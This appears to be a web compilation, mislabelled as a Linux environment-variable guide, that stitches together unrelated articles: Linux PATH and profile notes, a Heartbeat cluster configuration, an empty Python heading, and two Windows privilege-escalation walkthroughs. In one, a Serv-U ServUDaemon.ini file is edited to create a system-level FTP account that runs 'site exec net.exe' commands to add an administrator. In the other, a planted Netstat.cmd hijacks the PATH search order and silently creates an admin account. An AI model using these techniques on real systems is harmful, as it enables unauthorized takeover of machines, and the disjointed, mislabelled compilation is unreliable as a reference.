A Detailed Guide to Environment Variable Configuration Files in Linux (a collection of 7 articles)
Environment variables are closely tied to the shell. When a user logs in, a shell is started; on Linux this is usually bash, although it can be reconfigured or switched to another shell, and on UNIX it may be the C shell. Environment variables are set with shell commands, and once set they are available to every program run by the current user. In bash an environment variable is read by referring to its name and is set (and exported) with the export command. The following examples illustrate this.
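For instance, a minimal bash sketch (the variable name MYAPP_HOME and its value are made-up examples, not taken from the text):
$ export MYAPP_HOME=/opt/myapp      # set the variable and export it into the environment
$ echo $MYAPP_HOME                  # read it back through its name
/opt/myapp
$ env | grep MYAPP_HOME             # exported variables are passed on to programs the user runs
MYAPP_HOME=/opt/myapp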
I. System level:
1) /etc/profile: this file sets environment information for every user on the system and is executed when the user first logs in.
Part 2: Serv-U Configuration Files Explained and Privilege Escalation
After users are configured, Serv-U stores the configuration, including each user's permissions and accessible directories, in the file ServUDaemon.ini. A restricted local user, or a remote attacker, who can read and write Serv-U's installation directory can modify ServUDaemon.ini so that arbitrary commands are executed through the FTP process with the privileges of the FTP system administrator, both locally and remotely.
Assume a restricted local user can browse Serv-U's installation directory and finds ServUDaemon.ini. Opened in Notepad, the original file looks roughly like this:
[GLOBAL]
Version=4.1.0.0 // Serv-U FTP Server version number
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/
AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo wAGnUBuycB
ReloadSettings=True
#After modifying the INI file, add this entry; Serv-U then reloads the configuration file automatically and the entry disappears. Add it again after each further change.
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0 //host IP, domain name and port
[Domain1]
User1=hackgg|1|0
[USER=hackgg|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c: // directory the user may browse
TimeOut=600
Access1=C:|RWAMLCDP
Add a user in the standard format, then modify it as follows:
TimeOut=600
Maintenance=System //privilege type; add this extra line to make the new account a system administrator
Access1=C:|RWAMELCDP //use the drive that holds the system here
#Required. The password. Algorithm: generate two random characters, e.g. hr; prepend them to the plaintext password (e.g. test) and hash the result with MD5, i.e. MD5("hrtest"); then convert all lowercase letters in the digest to uppercase
#and put the two random characters in front, so "hr" + "1589A4F0334FDF55D52F26DFA2D3CCEB" becomes the final stored password
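As a rough sketch of that algorithm on a Linux command line (the seed hr and the plaintext test are the example values from the text; whether the digest shown above really corresponds to them is not verified here):
$ echo -n "hrtest" | md5sum | cut -d' ' -f1 | tr 'a-f' 'A-F'   # uppercased MD5 of seed+password
Password=hr<output of the command above>                       # prepend the two seed characters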
A standard Serv-U user configuration section looks like this:
[Domain1]
User1=admin|1|0
User2=test|1|0
[USER=admin|1]
Password=hr1589A4F0334FDF55D52F26DFA2D3CCEB
HomeDir=g:
RelPaths=
DiskQuota=1|153600000|0
TimeOut=600
Access1=g:|RWAMLCDP
[USER=test|1]
Password=hr1589A4F0334FDF55D52F26DFA2D3CCEB
HomeDir=f:\test
RelPaths=
DiskQuota=1|153600000|0
TimeOut=600
Access1=f:\test|RWAMLCDP
The following line is the permission setting; here is what each parameter means:
Access1=g:|RWAMELCDP
#Required. The access rights for the directory; the default set is RWAMLCDP. The letters do not have to appear in any particular order.
# Format: Access<n>=<directory>|<rights>
#R read
#W write
#A append
#M modify
#E execute (for security reasons, no account should have this right enabled)
#L list directory
#C create directories
#D delete directories
#P inherit the rights to subdirectories
Once the account has been created successfully, exploitation can begin:
ftp>cd system32 //change to the system32 directory
250 Directory changed to /WINDOWS/system32
ftp>quote site exec net.exe user sasa 1111 /add //use the system's net.exe to add a user
ftp>quote site exec net.exe localgroup administrators sasa /add //promote the new user to administrator
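Putting the pieces together, a session might look roughly like this (127.0.0.1 and the hackgg/test account are the example values used earlier; the exact prompts depend on the FTP client):
C:\> ftp 127.0.0.1
User (127.0.0.1:(none)): hackgg
Password: test
ftp> cd system32
ftp> quote site exec net.exe user sasa 1111 /add
ftp> quote site exec net.exe localgroup administrators sasa /add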
Part 3: How to Use Environment Variables in Privilege Escalation
First, what exactly is an environment variable?
Environment variables are parameters in the operating system that describe its running environment, such as the location of the temporary folder and of the system folders. They are somewhat like the default path in the DOS era: when you run a program, the system looks for it not only in the current folder but also in the configured default paths. For example, "Path" is one such variable; it stores the directories that hold commonly used commands.
To see the system's current environment variables, run the SET command.
Below is the output returned by SET:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\Administrator\Application Data
CLIENTNAME=Console
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=145F63CA0A6F46D
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\Administrator
LOGONSERVER=\\145F63CA0A6F46D
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=D:\Progra~1\Borland\Delphi7\Bin;D:\Progra~1\Borland\Delphi7\Projects\Bpl;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 6, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0f06
ProgramFiles=C:\Program Files
PROMPT=$P$G
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
TMP=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
USERDOMAIN=145F63CA0A6F46D
USERNAME=Administrator
USERPROFILE=C:\Documents and Settings\Administrator
windir=C:\WINDOWS
======================================================================
As we know, when we drop a small common tool such as NC into SYSTEM32, we can run the NC command no matter what the current directory is, which is quite convenient for hacking, isn't it?
That is exactly the Path variable at work.
If you delete everything in the Path variable, the system will no longer recognize the original system commands.
In other words, when we type a command in CMD, the system looks for the matching program in the following order:
1. Executable files in the current directory.
2. The directories listed in the Path variable, in order.
OK, now that we have a rough picture of environment variables, let's get to the point: how to use them to make our hacking easier.
As we know, the PERL installer prepends c:\perl\bin to the Path variable //the exact directory depends on the installation
When the administrator configures permissions carelessly, the permissions on this directory are often overlooked (with the default permissions, every Windows version leaves it writable), which gives us the opportunity for privilege escalation.
Here is an example of how to exploit this.
//Whether it can be exploited depends on where the directory sits inside the Path variable and on whether the directory is writable.
//The directory must appear before the system's built-in entries in the environment variable.
Assume the following conditions:
The target has PERL installed, in the directory c:\perl\bin
//the directory is writable
The Path variable among the system environment variables contains:
Path=c:\perl\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
We can create the following file in that directory:
Netstat.cmd
or
Netstat.bat //any other commonly used system command works as well; adapt the idea as needed. THX~
The file contents are:
@net user netpatch nspcn.org /add>nul
Rem Remember to prefix each command with @ and to append >nul at the end.
Rem The @ hides the command itself.
Rem >nul hides the output that the command produces.
@%systemroot%\system32\netstat.exe %1 %2 %3 %4 %5 %6
Rem Anyone who has studied batch files will recognize that %1 %2 %3 and so on simply pass the original arguments through.
When the administrator runs a command, the system first looks for an executable in the current directory, which by default is "C:\Documents and Settings\Administrator" (it depends on the logged-in user). When no Netstat program is found there, the search continues through the directories defined in the Path variable, in order; because c:\perl\bin sits in front of the system directories, our Netstat.cmd is found and executed first, so the commands inside it run with the administrator's privileges before the real netstat.exe is called.
Part 4: The Differences Between the Linux Configuration Files That Set Environment Variables
/etc/profile: this file sets environment information for every user on the system and is executed when the user first logs in.
Part 5: Modifying the PATH Environment Variable in Linux
The value of PATH is a series of directories; when you run a program, Linux searches these directories for it. The following command shows the value of PATH:
$ echo $PATH
For example, on this host the PATH value of user yogin is:
/opt/kde/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/yogin/bin
Here ":" is the separator, so the string above can be read as the following list of directories (a one-liner that prints the list this way is sketched right after it):
/opt/kde/bin
/usr/local/bin
/bin
/usr/bin
/usr/X11R6/bin
/home/yogin/bin
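A small sketch that prints the same list directly, by letting tr turn every ":" into a newline:
$ echo $PATH | tr ':' '\n'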
Similarly, on the same host, the PATH value of user root is:
/opt/kde/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin
To change the PATH for all users, edit the /etc/profile file as root and modify the line that contains "PATH=".
For example, you can open /etc/profile with the pico editor:
$ pico -w /etc/profile
pico is a text editor; the -w option turns off wrapping of long lines.
The new PATH value takes effect only after the user logs in again. To change the PATH of a single user only, edit the .bash_profile file in that user's home directory instead.
If you want the current directory included in the PATH, add "." to it, so that PATH is set as follows:
PATH=“$PATH:/usr/X11R6/bin:.”
export PATH
Note: after changing PATH, or any other environment variable, export it with export so that the new value takes effect.
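A minimal sketch, assuming the change was made in the current user's ~/.bash_profile; source re-reads the file so the new value takes effect without logging out again:
$ source ~/.bash_profile    # re-read the edited profile
$ echo $PATH                # verify the new value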
Part 6: The Three Heartbeat Configuration Files (Unix systems)
I had not set up a two-node Heartbeat cluster before; I tried it on VMware today and it worked reasonably well.
I. Installing the packages:
First install the following packages:
ipvsadm-1.21-1.rh.el.1.i386.rpm
ipvsadm-debuginfo-1.21-1.rh.el.1.i386.rpm
libnet-1.1.0-1.rh.el.1.i386.rpm
libnet-debuginfo-1.1.0-1.rh.el.1.i386.rpm
perl-Authen-SASL-2.03-1.rh.el.um.1.noarch.rpm
perl-Convert-ASN1-0.16-2.rh.el.um.1.noarch.rpm
perl-Digest-HMAC-1.01-11.1.noarch.rpm
perl-Digest-SHA1-2.01-15.1.i386.rpm
perl-IO-Socket-SSL-0.92-1.rh.el.um.1.noarch.rpm
perl-ldap-0.2701-1.rh.el.um.1.noarch.rpm
perl-Mail-IMAPClient-2.2.7-1.rh.el.um.1.noarch.rpm
perl-Net-SSLeay-1.23-1.rh.el.um.1.i386.rpm
perl-Net-SSLeay-debuginfo-1.23-1.rh.el.um.1.i386.rpm
perl-Parse-RecDescent-1.80-1.rh.el.um.1.noarch.rpm
perl-XML-NamespaceSupport-1.08-1.rh.el.um.1.noarch.rpm
perl-XML-SAX-0.12-1.rh.el.um.1.noarch.rpm
Then install the following packages (an example rpm command is sketched after this list):
heartbeat-ldirectord-1.2.3-2.rh.el.3.0.i386.rpm
heartbeat-1.2.3-2.rh.el.3.0.i386.rpm
heartbeat-pils-1.2.3-2.rh.el.3.0.i386.rpm
heartbeat-stonith-1.2.3-2.rh.el.3.0.i386.rpm
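A hedged sketch of installing them with rpm, assuming all of the .rpm files listed above sit in the current directory:
rpm -ivh ipvsadm-*.rpm libnet-*.rpm perl-*.rpm    # the prerequisite packages first
rpm -ivh heartbeat-pils-*.rpm heartbeat-stonith-*.rpm heartbeat-1.2.3-*.rpm heartbeat-ldirectord-*.rpm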
II. The configuration files:
/etc/hosts
127.0.0.1 localhost.localdomain localhost
192.168.247.160 ha1.chess.gz ha1
192.168.247.161 ha2.chess.gz ha2
192.168.247.180 ha.chess.gz ha
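With this /etc/hosts in place on both machines, name resolution between the nodes can be checked quickly (a sketch, run from ha1):
$ ping -c 1 ha2.chess.gz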
/etc/ha.d/authkeys
#
# Authentication file. Must be mode 600
#
#
# Must have exactly one auth directive at the front.
# auth send authentication using this method-id
#
# Then, list the method and key that go with that method-id
#
# Available methods: crc, sha1, md5. Crc doesn't need/want a key.
#
# You normally only have one authentication method-id listed in this file
#
# Put more than one to make a smooth transition when changing auth
# methods and/or keys.
#
#
# sha1 is believed to be the “best”, md5 next best.
#
# crc adds no security, except from packet corruption.
# Use only on physically secure networks.
#
auth 1
1 crc
#2 sha1 HI!
#3 md5 Hello!
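As the comments above require, this file must not be readable by anyone else; a one-line sketch to set the mode:
chmod 600 /etc/ha.d/authkeys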
/etc/ha.d/ha.cf
#
# There are lots of options in this file. All you have to have is a set
# of nodes listed {“node ...} one of {serial, bcast, mcast, or ucast},
# and a value for ”auto_failback“.
#
# ATTENTION: As the configuration file is read line by line,
# THE ORDER OF DIRECTIVE MATTERS!
#
# In particular, make sure that the udpport, serial baud rate
# etc. are set before the heartbeat media are defined!
# debug and log file directives go into effect when they
# are encountered.
#
# All will be fine if you keep them ordered as in this example.
#
#
# Note on logging:
# If any of debugfile, logfile and logfacility are defined then they
# will be used. If debugfile and/or logfile are not defined and
# logfacility is defined then the respective logging and debug
# messages will be logged to syslog. If logfacility is not defined
# then debugfile and logfile will be used to log messages. If
# logfacility is not defined and debugfile and/or logfile are not
# defined then defaults will be used for debugfile and logfile as
# required and messages will be sent there.
#
# File to write debug messages to
debugfile /var/log/ha-debug
#
#
# File to write other messages to
#
logfile /var/log/ha-log
#
#
# Facility to use for syslog/logger
#
logfacility local0
#
#
# A note on specifying ”how long“ times below...
#
# The default time unit is seconds
# 10 means ten seconds
#
# You can also specify them in milliseconds
# 1500ms means 1.5 seconds
#
#
# keepalive: how long between heartbeats?
#
keepalive 2
#
# deadtime: how long-to-declare-host-dead?
#
# If you set this too low you will get the problematic
# split-brain (or cluster partition) problem.
# See the FAQ for how to use warntime to tune deadtime.
#
deadtime 10
#
# warntime: how long before issuing ”late heartbeat“ warning?
# See the FAQ for how to use warntime to tune deadtime.
#
warntime 10
#
#
# Very first dead time (initdead)
#
# On some machines/OSes, etc. the network takes a while to come up
# and start working right after you've been rebooted. As a result
# we have a separate dead time for when things first come up.
# It should be at least twice the normal dead time.
#
initdead 120
#
#
# What UDP port to use for bcast/ucast communication?
#
udpport 694
#
# Baud rate for serial ports...
#
#baud 19200
#
# serial serialportname ...
#serial /dev/ttyS0 #Linux
#serial /dev/cuaa0 # FreeBSD
#serial /dev/cua/a # Solaris
#
#
# What interfaces to broadcast heartbeats over?
#
#bcast eth0 # Linux
#bcast eth1 eth2 # Linux
#bcast le0 # Solaris
#bcast le1 le2 # Solaris
bcast eth0
#
# Set up a multicast heartbeat medium
# mcast [dev] [mcast group] [port] [ttl] [loop]
#
# [dev] device to send/rcv heartbeats on
# [mcast group] multicast group to join (class D multicast address
# 224.0.0.0 - 239.255.255.255)
# [port] udp port to sendto/rcvfrom (set this value to the
# same value as ”udpport“ above)
# [ttl] the ttl value for outbound heartbeats. this effects
# how far the multicast packet will propagate. (0-255)
# Must be greater than zero.
# [loop] toggles loopback for outbound multicast heartbeats.
# if enabled, an outbound packet will be looped back and
# received by the interface it was sent on. (0 or 1)
# Set this value to zero.
#
#
#mcast eth0 225.0.0.1 694 1 0
mcast eth1 225.0.0.1 694 1 0
#
# Set up a unicast / udp heartbeat medium
# ucast [dev] [peer-ip-addr]
#
# [dev] device to send/rcv heartbeats on
# [peer-ip-addr] IP address of peer to send packets to
#
#ucast eth0 192.168.1.2
#
#
# About boolean values...
#
# Any of the following case-insensitive values will work for true:
# true, on, yes, y, 1
# Any of the following case-insensitive values will work for false:
# false, off, no, n, 0
#
#
#
# auto_failback: determines whether a resource will
# automatically fail back to its ”primary“ node, or remain
# on whatever node is serving it until that node fails, or
# an administrator intervenes.
#
# The possible values for auto_failback are:
# on - enable automatic failbacks
# off - disable automatic failbacks
# legacy - enable automatic failbacks in systems
# where all nodes do not yet support
# the auto_failback option.
#
# auto_failback ”on“ and ”off“ are backwards compatible with the old
# ”nice_failback on“ setting.
#
# See the FAQ for information on how to convert
# from ”legacy“ to ”on“ without a flash cut.
# (i.e., using a ”rolling upgrade“ process)
#
# The default value for auto_failback is ”legacy“, which
# will issue a warning at startup. So, make sure you put
# an auto_failback directive in your ha.cf file.
# (note: auto_failback can be any boolean or ”legacy“)
#
auto_failback on
#
#
# Basic STONITH support
# Using this directive assumes that there is one stonith
# device in the cluster. Parameters to this device are
# read from a configuration file. The format of this line is:
#
# stonith <stonith_type> <configfile>
#
# NOTE: it is up to you to maintain this file on each node in the
# cluster!
#
#stonith baytech /etc/ha.d/conf/stonith.baytech
#
# STONITH support
# You can configure multiple stonith devices using this directive.
# The format of the line is:
# stonith_host <hostfrom> <stonith_type> <params...>
#
# <hostfrom> is the machine the stonith device is attached
# to or * to mean it is accessible from any host.
#
# <stonith_type> is the type of stonith device (a list of
# supported drives is in /usr/lib/stonith.)
#
# <params...> are driver specific parameters. To see the
# format for a particular device, run:
# stonith -l -t <stonith_type>
#
#
# Note that if you put your stonith device access information in
# here, and you make this file publically readable, you're asking
# for a denial of service attack ;-)
#
# To get a list of supported stonith devices, run
# stonith -L
# For detailed information on which stonith devices are supported
# and their detailed configuration options, run this command:
# stonith -h
#
#stonith_host * baytech 10.0.0.3 mylogin mysecretpassword
#stonith_host ken3 rps10 /dev/ttyS1 kathy 0
#stonith_host kathy rps10 /dev/ttyS1 ken3 0
#
# Watchdog is the watchdog timer. If our own heart doesn't beat for
# a minute, then our machine will reboot.
# NOTE: If you are using the software watchdog, you very likely
# wish to load the module with the parameter “nowayout=0” or
# compile it without CONFIG_WATCHDOG_NOWAYOUT set. Otherwise even
# an orderly shutdown of heartbeat will trigger a reboot, which is
# very likely NOT what you want.
#
watchdog /dev/watchdog
#
# Tell what machines are in the cluster
# node nodename ... -- must match uname -n
#node ken3
#node kathy
node ha1.chess.gz
node ha2.chess.gz
#
# Less common options...
#
# Treats 10.10.10.254 as a pseudo-cluster-member
# Used together with ipfail below...
#
#ping 10.10.10.254
#
# Treats 10.10.10.254 and 10.10.10.253 as a pseudo-cluster-member
# called group1. If either 10.10.10.254 or 10.10.10.253 are up
# then group1 is up
# Used together with ipfail below...
#
#ping_group group1 10.10.10.254 10.10.10.253
#
# Processes started and stopped with heartbeat. Restarted unless
# they exit with rc=100
#
#respawn userid /path/name/to/run
#respawn hacluster /usr/lib/heartbeat/ipfail
#
# Access control for client api
# default is no access
#
#apiauth client-name gid=gidlist uid=uidlist
#apiauth ipfail gid=haclient uid=hacluster
###########################
#
# Unusual options.
#
###########################
#
# hopfudge maximum hop count minus number of nodes in config
#hopfudge 1
#
# deadping - dead time for ping nodes
#deadping 30
#
# hbgenmethod - Heartbeat generation number creation method
# Normally these are stored on disk and incremented as needed.
#hbgenmethod time
#
# realtime - enable/disable realtime execution (high priority, etc.)
# defaults to on
#realtime off
#
# debug - set debug level
# defaults to zero
#debug 1
#
# API Authentication - replaces the fifo-permissions-based system of the past
#
#
# You can put a uid list and/or a gid list.
# If you put both, then a process is authorized if it qualifies under either
# the uid list, or under the gid list.
#
# The groupname “default” has special meaning. If it is specified, then
# this will be used for authorizing groupless clients, and any client groups
# not otherwise specified.
#
#apiauth ipfail uid=hacluster
#apiauth ccm uid=hacluster
#apiauth ping gid=haclient uid=alanr,root
#apiauth default gid=haclient
# message format in the wire, it can be classic or netstring, default is classic
#msgfmt netstring
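Because ha.cf requires each node name to match the output of uname -n, it is worth checking this on both machines before starting heartbeat (the host name shown below is the one used in this example):
$ uname -n
ha1.chess.gz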
/etc/ha.d/haresources
#
# This is a list of resources that move from machine to machine as
# nodes go down and come up in the cluster. Do not include
# “administrative” or fixed IP addresses in this file.
#
#
# The haresources files MUST BE IDENTICAL on all nodes of the cluster.
#
# The node names listed in front of the resource group information
# is the name of the preferred node to run the service. It is
# not necessarily the name of the current machine. If you are running
# auto_failback ON (or legacy), then these services will be started
# up on the preferred nodes - any time they're up.
#
# If you are running with auto_failback OFF, then the node information
# will be used in the case of a simultaneous start-up, or when using
# the hb_standby command.
#
# BUT FOR ALL OF THESE CASES, the haresources files MUST BE IDENTICAL.
# If your files are different then almost certainly something
# won't work right.
#
#
#
# We refer to this file when we're coming up, and when a machine is being
# taken over after going down.
#
# You need to make this right for your installation, then install it in
# /etc/ha.d
#
# Each logical line in the file constitutes a “resource group”.
# A resource group is a list of resources which move together from
# one node to another - in the order listed. It is assumed that there
# is no relationship between different resource groups. These
# resource in a resource group are started left-to-right, and stopped
# right-to-left. Long lists of resources can be continued from line
# to line by ending the lines with backslashes ("\").
#
# These resources in this file are either IP addresses, or the name
# of scripts to run to “start” or “stop” the given resource.
#
# The format is like this:
#
#node-name resource1 resource2 ... resourceN
#
#
# If the resource name contains an :: in the middle of it, the
# part after the :: is passed to the resource script as an argument.
# Multiple arguments are separated by the :: delimiter
#
# In the case of IP addresses, the resource script name IPaddr is
# implied.
#
# For example, the IP address 135.9.8.7 could also be represented
# as IPaddr::135.9.8.7
#
# THIS IS IMPORTANT!! vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
#
# The given IP address is directed to an interface which has a route
# to the given address. This means you have to have a net route
# set up outside of the High-Availability structure. We don't set it
# up here -- we key off of it.
#
# The broadcast address for the IP alias that is created to support
# an IP address defaults to the highest address on the subnet.
#
# The netmask for the IP alias that is created defaults to the same
# netmask as the route that it selected in the step above.
#
# The base interface for the IP alias that is created defaults to the
# same interface as the route that it selected in the step above.
#
# If you want to specify that this IP address is to be brought up
# on a subnet with a netmask of 255.255.255.0, you would specify
# this as IPaddr::135.9.8.7/24 .
#
# If you wished to tell it that the broadcast address for this subnet
# was 135.9.8.210, then you would specify that this way:
# IPaddr::135.9.8.7/24/135.9.8.210
#
# If you wished to tell it that the interface to add the address to
# is eth0, then you would need to specify it this way:
# IPaddr::135.9.8.7/24/eth0
#
# And this way to specify both the broadcast address and the
# interface:
# IPaddr::135.9.8.7/24/eth0/135.9.8.210
#
# The IP addresses you list in this file are called “service” addresses,
# since they're the publicly advertised addresses that clients
# use to get at highly available services.
#
# For a hot/standby (non load-sharing) 2-node system with only
# a single service address,
# you will probably only put one system name and one IP address in here.
# The name you give the address to is the name of the default “hot”
# system.
#
# Where the nodename is the name of the node which “normally” owns the
# resource. If this machine is up, it will always have the resource
# it is shown as owning.
#
# The string you put in for nodename must match the uname -n name
# of your machine. Depending on how you have it administered, it could
# be a short name or a FQDN.
#
#-------------------------------------------------------------------
#
# Simple case: One service address, default subnet and netmask
# No servers that go up and down with the IP address
#
#just.linux-ha.org 135.9.216.110
#
#-------------------------------------------------------------------
#
# Assuming the administrative addresses are on the same subnet...
# A little more complex case: One service address, default subnet
# and netmask, and you want to start and stop http when you get
# the IP address...
#
#just.linux-ha.org 135.9.216.110 http
#-------------------------------------------------------------------
#
#-------------------------------------------------------------------
#
# A little more complex case: Three service addresses, default subnet
# and netmask, and you want to start and stop http when you get
# the IP address...
#
#just.linux-ha.org 135.9.216.110 135.9.215.111 135.9.216.112 httpd
#-------------------------------------------------------------------
#
# One service address, with the subnet, interface and bcast addr
# explicitly defined.
#
#just.linux-ha.org 135.9.216.3/28/eth0/135.9.216.12 httpd
#
#-------------------------------------------------------------------
#
# An example where a shared filesystem is to be used.
# Note that multiple arguments are passed to this script using
# the delimiter '::' to separate each argument.
#
#node1 10.0.0.170 Filesystem::/dev/sda1::/data1::ext2
#
# Regarding the node-names in this file:
#
# They must match the names of the nodes listed in ha.cf, which in turn
# must match the `uname -n` of some node in the cluster. So they aren't
# virtual in any sense of the word.
#
ha1.chess.gz 192.168.247.180 Filesystem::/dev/sdb2::/::ext3::rw httpd Filesystem::/dev/sdb1::/exports::ext3::rw nfs
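Once these three files are identical on both nodes, heartbeat can be started through the init script installed by the RPMs (a sketch; run on both nodes):
/etc/init.d/heartbeat start
chkconfig heartbeat on    # optional: start heartbeat automatically at boot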
Part 7: The for Loop in Python Explained